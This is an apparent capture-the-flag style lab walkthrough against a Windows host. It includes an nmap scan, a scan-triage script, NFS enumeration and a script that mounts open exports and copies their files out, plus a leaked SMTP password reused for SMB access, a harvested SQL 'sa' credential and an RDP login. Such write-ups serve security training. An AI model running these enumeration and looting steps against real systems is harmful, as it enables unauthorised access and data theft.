Medium Lab

May 18, 2024

# Nmap 7.94 scan initiated Sat May 18 00:33:17 2024 as: nmap -sC -sV -sS -oN nmap -vv 10.129.202.41
Nmap scan report for 10.129.202.41
Host is up, received echo-reply ttl 127 (0.29s latency).
Scanned at 2024-05-18 00:33:18 PST for 107s
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE       REASON          VERSION
111/tcp  open  rpcbind       syn-ack ttl 127 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds? syn-ack ttl 127
2049/tcp open  nlockmgr      syn-ack ttl 127 1-4 (RPC #100021)
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
|_ssl-date: 2024-05-17T16:35:02+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=WINMEDIUM
| Issuer: commonName=WINMEDIUM
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-16T16:31:08
| Not valid after:  2024-11-15T16:31:08
| MD5:   9e56:26fa:d8bf:3278:17e9:7b85:c601:258e
| SHA-1: fc99:f1c2:c7b1:9885:1e2b:8e88:c7d1:175f:aa5c:4d3b
| -----BEGIN CERTIFICATE-----
| MIIC1jCCAb6gAwIBAgIQGPITOA3tdIBCgx2Mi4BeSDANBgkqhkiG9w0BAQsFADAU
| MRIwEAYDVQQDEwlXSU5NRURJVU0wHhcNMjQwNTE2MTYzMTA4WhcNMjQxMTE1MTYz
| MTA4WjAUMRIwEAYDVQQDEwlXSU5NRURJVU0wggEiMA0GCSqGSIb3DQEBAQUAA4IB
| DwAwggEKAoIBAQDUzzxYqO7XT7EAwcx6rPUSVl2Cs8Wu4JVrw7c6Wir4Of7uPRb3
| GB+jEGOJWsA2CO0rAhZQI5+0eBW7XY314kaeIetAq3n92kvUho4j8yLCXbI8WCFl
| Ef3t/Oi6cn9RzO/wjsTs7yHaYFeMlgsokw3YFwgKoqsz2L6u2XdWINKmNFnlQHVr
| MRweKqj3qnSSU9robwaCTE7LH+N2yQaZluKlhWWqNoJG7kTBmKavKgA/m2gAVFIN
| p05YpbeA+QQTZC++2SO4UphJIJ6E71MFyqmpICYQJ2n6D9LOIq1qzOZycjYA0UEd
| iRceT/kih/WJKxmFezCF0T2wYja2y0tLGad5AgMBAAGjJDAiMBMGA1UdJQQMMAoG
| CCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsFAAOCAQEASBTbLWfx
| S5WVVRfGNkdsWXyl4YUEgSb0IlJeq19oyLVJzEoogCtqdI0U3r9mxIUlr4tL+Jge
| d/4Lb3tMvdw2xZzK6sHAT2w0oz72N9ac9cwNr5tAqERiKITNHMI0b5/OMsG9rCYv
| 6sACitefwVYIoK53qFjg6bJ604hnIqg8hocYypJCDxFNn0gYzZpamhghh80n4Mdl
| 6HCttN/Kax0/zZZejpe98FxcWN62UwgNoQUem4dRJ8pF4VOX5NYcT8Cu1vuqw3sx
| OFT3UIosQU6UwhdDVr4NeoJ2PZSAja+VfzN8TrX+tf0Smce5oYm1vaL0lh8v8/4G
| 6pwEk2uLSPXdkg==
|_-----END CERTIFICATE-----
| rdp-ntlm-info: 
|   Target_Name: WINMEDIUM
|   NetBIOS_Domain_Name: WINMEDIUM
|   NetBIOS_Computer_Name: WINMEDIUM
|   DNS_Domain_Name: WINMEDIUM
|   DNS_Computer_Name: WINMEDIUM
|   Product_Version: 10.0.17763
|_  System_Time: 2024-05-17T16:34:36+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 3s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 47689/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 46177/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 28088/udp): CLEAN (Timeout)
|   Check 4 (port 27218/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2024-05-17T16:34:39
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 18 00:35:05 2024 -- 1 IP address (1 host up) scanned in 107.71 seconds
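Triage script for the scan above (an added example, not part of the original notes): it reads a saved `nmap -oN` file and pulls out the three findings that drive the rest of this lab, namely the RPC programs from the `rpcinfo` table (program 100003 is the NFS server and 100005 is mountd, so `showmount -e` is the next step), the SMB2 signing policy ("enabled but not required" means a machine that can be relayed to), and the open ports. The `SCAN_SAMPLE` string is a constructed excerpt of the output shown above, embedded so the script runs offline.

```shell
#!/bin/sh
# Added example: triage a saved `nmap -sC -sV -oN` file. Not code from the original notes.
# Every function reads nmap "normal" output on stdin.

# Constructed excerpt of the scan shown above (sample input, not a live scan).
SCAN_SAMPLE='PORT     STATE SERVICE       REASON          VERSION
111/tcp  open  rpcbind       syn-ack ttl 127 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100005  1,2,3       2049/tcp   mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|_  100024  1           2049/udp   status
445/tcp  open  microsoft-ds? syn-ack ttl 127
2049/tcp open  nlockmgr      syn-ack ttl 127 1-4 (RPC #100021)
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required'

# "PORT/PROTO SERVICE" for every port whose STATE column is "open".
open_ports() {
    awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" { print $1, $3 }'
}

# RPC programs from the rpcinfo NSE table as "SERVICE PORT/PROTO", deduplicated.
# Rows look like "|   100003  2,3,4       2049/tcp   nfs": field 1 is "|" or "|_",
# field 2 the 6-digit program number, field 4 port/proto, field 5 the service name.
rpc_programs() {
    awk '($1 == "|" || $1 == "|_") && $2 ~ /^[0-9][0-9][0-9][0-9][0-9][0-9]$/ && NF == 5 { print $5, $4 }' \
        | sort -u
}

# Exit 0 when both the NFS server (100003) and mountd (100005) are registered:
# that is the condition under which `showmount -e <target>` will list exports.
nfs_exposed() {
    progs=$(rpc_programs)
    printf '%s\n' "$progs" | grep -q '^nfs ' && printf '%s\n' "$progs" | grep -q '^mountd '
}

# SMB2 signing policy from smb2-security-mode: "required", "not required" or "unknown".
# "not required" means NTLM authentication to this host can be relayed from elsewhere.
smb_signing() {
    awk '
        /Message signing enabled and required/ { print "required";     found = 1; exit }
        /Message signing.*not required/        { print "not required"; found = 1; exit }
        END { if (!found) print "unknown" }'
}

# Full triage report for one scan file (or stdin when no argument is given).
triage() {
    scan=$(cat "${1:--}")
    echo "== open ports =="
    printf '%s\n' "$scan" | open_ports
    echo "== RPC programs =="
    printf '%s\n' "$scan" | rpc_programs
    if printf '%s\n' "$scan" | nfs_exposed; then
        echo "[!] NFS + mountd registered: run 'showmount -e <target>' and mount any export open to everyone"
    fi
    echo "[*] SMB signing: $(printf '%s\n' "$scan" | smb_signing)"
}

# With no file argument, run against the embedded sample.
if [ "$#" -gt 0 ]; then triage "$1"; else printf '%s\n' "$SCAN_SAMPLE" | triage; fi
```

Run it as `sh triage.sh nmap` against the `-oN` file from the scan; the awk field positions are tied to the layout of the `rpcinfo` table in nmap's normal output, so it will not parse `-oG` or `-oX` files.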
Note: the lab target IP changed between the scan above (10.129.202.41) and the steps below (10.129.61.86).

sudo showmount -e 10.129.61.86
mkdir /tmp/attacker
sudo mount -t nfs 10.129.61.86:/TechSupport /tmp/attacker/
cd /tmp/attacker
cp ticket4238791283782.txt /home/kyou/academy-htb/footprinting/medium-lab/tickets
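The NFS steps above as a script (an added example, not part of the original notes). It parses `showmount -e` output for exports that any client may mount, mounts each one read-only, lists the files with their numeric owner uid (NFS trusts whatever uid the client presents, so a file that is not world-readable can usually be read by creating a local user with the matching uid), copies the tree into a loot directory and unmounts. The `SHOWMOUNT_SAMPLE` string is a constructed sample of `showmount -e` output, and the host, loot path and the second `/Backups` export are assumptions for illustration.

```shell
#!/bin/sh
# Added example: enumerate and pull world-mountable NFS exports. Not code from the original notes.
# Needs showmount/mount from nfs-common and root (sudo) for the mount; the parsing works offline.

# Constructed sample of `showmount -e` output (not captured live; /Backups is invented).
SHOWMOUNT_SAMPLE='Export list for 10.129.61.86:
/TechSupport (everyone)
/Backups     10.129.0.0/16'

# "PATH CLIENTS" for each export, from `showmount -e` output on stdin (line 1 is the banner).
parse_exports() {
    awk 'NR > 1 && NF >= 2 { print $1, $2 }'
}

# Only exports whose client list is "(everyone)" or "*": anyone on the network can mount them.
world_exports() {
    parse_exports | awk '$2 == "(everyone)" || $2 == "*" { print $1 }'
}

# Mount one export read-only, list it with owner uids, copy it out, unmount.
pull_export() {
    host=$1; export_path=$2; loot=$3
    mnt=$(mktemp -d /tmp/nfs.XXXXXX)
    # ro: never write to the target; nolock: skip the NLM lock handshake, which often hangs on lab hosts
    sudo mount -t nfs -o ro,nolock "$host:$export_path" "$mnt" || { rmdir "$mnt"; return 1; }
    # ls -ln shows the numeric uid/gid: files unreadable as 'other' need a local user with that uid
    find "$mnt" -type f -exec ls -ln {} +
    mkdir -p "$loot"
    cp -r "$mnt/." "$loot/"
    sudo umount "$mnt" && rmdir "$mnt"
}

# Enumerate a host and pull every world-mountable export into ./loot/<export name>.
pull_all() {
    host=$1; loot=${2:-./loot}
    showmount -e "$host" | world_exports | while read -r path; do
        echo "[*] pulling $host:$path"
        pull_export "$host" "$path" "$loot/$(basename "$path")"
    done
}

if [ "$#" -gt 0 ]; then pull_all "$@"; fi
```

Usage: `sh nfs_pull.sh 10.129.61.86 ./loot`. Exports restricted to a subnet (the invented `/Backups` line) are skipped, since mounting them from outside that range just fails; the `(everyone)` export is the one that leaked the ticket above.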
Conversation with InlaneFreight Ltd

Started on November 10, 2021 at 01:27 PM London time GMT (GMT+0200)
---
01:27 PM | Operator: Hello.

So what brings you here today?
01:27 PM | alex: hello
01:27 PM | Operator: Hey alex!
01:27 PM | Operator: What do you need help with?
01:36 PM | alex: I ran into an issue with the web config file on the system for the SMTP server. Do you mind taking a look at the config?
01:38 PM | Operator: Of course
01:42 PM | alex: here it is:

smtp {
    host=smtp.web.dev.inlanefreight.htb
    #port=25
    ssl=true
    user="alex"
    password="lol123!mD"
    from="alex.g@web.dev.inlanefreight.htb"
}

securesocial {

    onLoginGoTo=/
    onLogoutGoTo=/login
    ssl=false

    userpass {
        withUserNameSupport=false
        sendWelcomeEmail=true
        enableGravatarSupport=true
        signupSkipLogin=true
        tokenDuration=60
        tokenDeleteInterval=5
        minimumPasswordLength=8
        enableTokenJob=true
        hasher=bcrypt
    }

    cookie {
    #       name=id
    #       path=/login
    #       domain="10.129.2.59:9500"
            httpOnly=true
            makeTransient=false
            absoluteTimeoutInMinutes=1440
            idleTimeoutInMinutes=1440
    }



---
The SMTP password from the ticket (lol123!mD) is reused for alex's SMB login:

smbclient -U alex -L 10.129.61.86
smbclient -U alex \\\\10.129.61.86\\devshare

devshare holds a second credential pair in user:password form (sa is the SQL Server admin login):

sa:87N1ns@slls83

smbclient -U alex \\\\10.129.61.86\\Users
cd alex
ls
cd Desktop
ls

Then I try using RDP to log in as the alex user.

After that, just run the MSSQL studio as an admin user.

remmina
